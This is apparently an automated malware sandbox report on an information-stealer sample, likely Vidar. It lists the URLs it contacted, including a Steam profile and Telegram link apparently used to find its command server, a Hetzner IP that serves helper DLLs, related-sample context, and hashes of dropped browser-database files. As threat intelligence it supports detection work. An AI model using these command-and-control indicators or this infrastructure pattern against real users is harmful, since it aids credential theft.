                    https://store.steampowered.com/news/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiGCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://95.217.240.10176561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&aRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/tIPRegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=HIEBAK.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/discussions/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/stats/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchHIEBAK.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://t.me/k0monofile.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/DRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322/inventory/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322/badgesRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/workshop/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://95.217.240.101/ORegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=eRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.2647482481.000000001B6CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101KEGRegAsm.exe, 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUzRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoHIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=HIEBAK.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/sqlx.dllIRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/msvcp140.dllyS#RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/mobileRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.102.42.29
                    		steamcommunity.comUnited States
                    		16625AKAMAI-ASUStrue
                    95.217.240.101
                    		unknownGermany
                    		24940HETZNER-ASDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1443407
                    Start date and time:2024-05-17 18:05:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 1s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/27@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 103
                    • Number of non-executed functions: 225
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    12:06:06API Interceptor1x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.102.42.29https://steamfiller.ru/Get hashmaliciousUnknownBrowse
                      https://store-steampowered-com.glitch.me/Get hashmaliciousUnknownBrowse
                        file.exeGet hashmaliciousCryptOne, VidarBrowse
                          file.exeGet hashmaliciousVidarBrowse
                            95.217.240.101file.exeGet hashmaliciousCryptOne, VidarBrowse
                              file.exeGet hashmaliciousVidarBrowse
                                SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exeGet hashmaliciousCryptOne, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, VidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    file.exeGet hashmaliciousVidarBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      steamcommunity.comAdvanced_IP_Scanner_2.5.4594.1 (1).exeGet hashmaliciousUnknownBrowse
                                      • 23.197.127.21
                                      file.exeGet hashmaliciousCryptOne, VidarBrowse
                                      • 104.102.42.29
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      6duXSAApsY.exeGet hashmaliciousUnknownBrowse
                                      • 23.194.234.100
                                      6duXSAApsY.exeGet hashmaliciousUnknownBrowse
                                      • 23.194.234.100
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 23.194.234.100
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 23.194.234.100
                                      file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                      • 184.85.65.125
                                      mod01_pdf.lnkGet hashmaliciousUnknownBrowse
                                      • 23.65.44.84

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      AKAMAI-ASUShttps://moovez-my.sharepoint.com/:b:/g/personal/simon_moovez_ca/Edv73DeH8wxAlyY5r6ObSWMBK8UknZLnAtmHvI33rMNtkQ?e=cmwzxT&sdata=REl4bkJnVEZ4NlN4cFNza0l4NE05V2JFSDR0bk5xY3YvLzF0SGxncGtEbz0=&xsdata=MDV8MDJ8c3RlcGhhbmllQGZsb29yc2NhcGVzLm5ldHw1MTRlNWE4ZWFhNGY0N2Q2ODAwNjA4ZGM3NWQ0Y2VkMnxlNDEzMDg5Yjg1ZWI0ODYyYWZiZGRmODkyMzdmZTQzMHwwfDB8NjM4NTE0ODA0NDk2NDYzOTE1fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXw0MDAwMHx8fA==Get hashmaliciousUnknownBrowse
                                      • 104.102.58.241
                                      https://www.scribd.com/document/733422217/Fnb-Payment-Notification#fullscreen&from_embedGet hashmaliciousUnknownBrowse
                                      • 2.19.224.146
                                      finalshell_windows_x64.exeGet hashmaliciousUnknownBrowse
                                      • 184.28.90.27
                                      https://steamfiller.ru/Get hashmaliciousUnknownBrowse
                                      • 104.119.108.85
                                      https://store-steampowered-com.glitch.me/Get hashmaliciousUnknownBrowse
                                      • 104.102.42.29
                                      Advanced_IP_Scanner_2.5.4594.1 (1).exeGet hashmaliciousUnknownBrowse
                                      • 184.28.90.27
                                      phish_alert_iocp_v1.4.48 (16).emlGet hashmaliciousHTMLPhisherBrowse
                                      • 184.28.90.27
                                      https://8zemsehbb.cc.rs6.net/tn.jsp?f=001M1AI5PZOFZM1B5SiH_iimsjbXPaMqjXwGuVNTBSVJYHmnPt158zI2s6Z2XkisB5VXWpsNZbuItwvadJzexO0C6eoaPw_w6IziDmPoW1Alq5eNnYS4ZfGhw2S_vasvtxXFx-3LFEK8kqx1Mf4AwajJVHikWlYm7kMkRkwSl2c2rE=&c=wiECqbHXSVLyfCOM33FCez0IU1THAkCsNbu9WkB0UIWK7-lFxNYP4g==&ch=_6rDubHh_EfmhrReDGRNST90HP04T0Z49AUhmOClps68Vz0NFgLVEA==#Mdan@virtualintelligencebriefing.comGet hashmaliciousUnknownBrowse
                                      • 2.19.244.178
                                      file.exeGet hashmaliciousCryptOne, VidarBrowse
                                      • 104.102.42.29
                                      https://flow.page/mainstreetinc.comGet hashmaliciousUnknownBrowse
                                      • 2.19.224.146
                                      HETZNER-ASDEhttp://154.205.143.54Get hashmaliciousUnknownBrowse
                                      • 135.181.16.82
                                      https://axovesb7koecn0j.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                      • 195.201.57.90
                                      https://vocc3-secondary.z35.web.core.windows.net/werrx01USAHTML/?bcda=1-833-234-2368Get hashmaliciousTechSupportScamBrowse
                                      • 195.201.57.90
                                      Advanced_IP_Scanner_2.5.4594.1 (1).exeGet hashmaliciousUnknownBrowse
                                      • 5.75.215.51
                                      file.exeGet hashmaliciousCryptOne, VidarBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 95.217.240.101
                                      https://www.chipchick.com/2024/05/deep-within-a-cave-researchers-came-across-two-ancient-sharks-that-lived-325-million-years-and-we-never-knew-about-them-before.htmlGet hashmaliciousUnknownBrowse
                                      • 178.63.241.79
                                      1G8k6LshGX.exeGet hashmaliciousQuasarBrowse
                                      • 195.201.57.90
                                      Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                      • 178.63.50.103
                                      p8OI6WMicj.elfGet hashmaliciousMiraiBrowse
                                      • 91.107.240.254

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousCryptOne, VidarBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousPrivateLoader, PureLog Stealer, Vidar, zgRATBrowse
                                      • 95.217.240.101
                                      file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, VidarBrowse
                                      • 95.217.240.101
                                      37f463bf4616ecd445d4a1937da06e19Konstabelens65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 104.102.42.29
                                      Dead or Alive 6 v1.0-v1.20 Plus 16 Trainer.exeGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29
                                      doc023561361500.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.102.42.29
                                      fdOerxdL1v.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                      • 104.102.42.29
                                      Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 104.102.42.29
                                      Underdistinction48.exeGet hashmaliciousGuLoaderBrowse
                                      • 104.102.42.29
                                      SecuriteInfo.com.PUA.RiskWare.Youxun.22766.22244.exeGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29
                                      SecuriteInfo.com.Win64.MalwareX-gen.8790.7087.exeGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\ProgramData\FCGCGDHJEGHJ\mozglue.dlltTcrJ0HtoJ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                        l2XteV3M4u.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                          7067B48pY6.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                            kYgzDmA3j5.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                              1TC3BiFJb3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                Obz5x6H28w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                  SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exeGet hashmaliciousCryptOne, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, VidarBrowse
                                                    emTKrlgehA.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                      file.exeGet hashmaliciousVidarBrowse
                                                        HaxexQ5EjD.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                          C:\ProgramData\FCGCGDHJEGHJ\freebl3.dlltTcrJ0HtoJ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                            l2XteV3M4u.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                              7067B48pY6.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                kYgzDmA3j5.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                  1TC3BiFJb3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                    Obz5x6H28w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                      SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exeGet hashmaliciousCryptOne, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, VidarBrowse
                                                                        emTKrlgehA.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                            HaxexQ5EjD.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse

                                                                              Created / dropped Files

                                                                              C:\ProgramData\FCGCGDHJEGHJ\DAKJDA

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):159744
                                                                              Entropy (8bit):0.5394293526345721
                                                                              Encrypted:false
                                                                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\DHDHJJ

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):0.8439810553697228
                                                                              Encrypted:false
                                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\EBGCBA

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):0.6732424250451717
                                                                              Encrypted:false
                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\EBKJDB

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):155648
                                                                              Entropy (8bit):0.5407252242845243
                                                                              Encrypted:false
                                                                              SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                              MD5:7B955D976803304F2C0505431A0CF1CF
                                                                              SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                              SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                              SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\FCGCGD

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):51200
                                                                              Entropy (8bit):0.8746135976761988
                                                                              Encrypted:false
                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
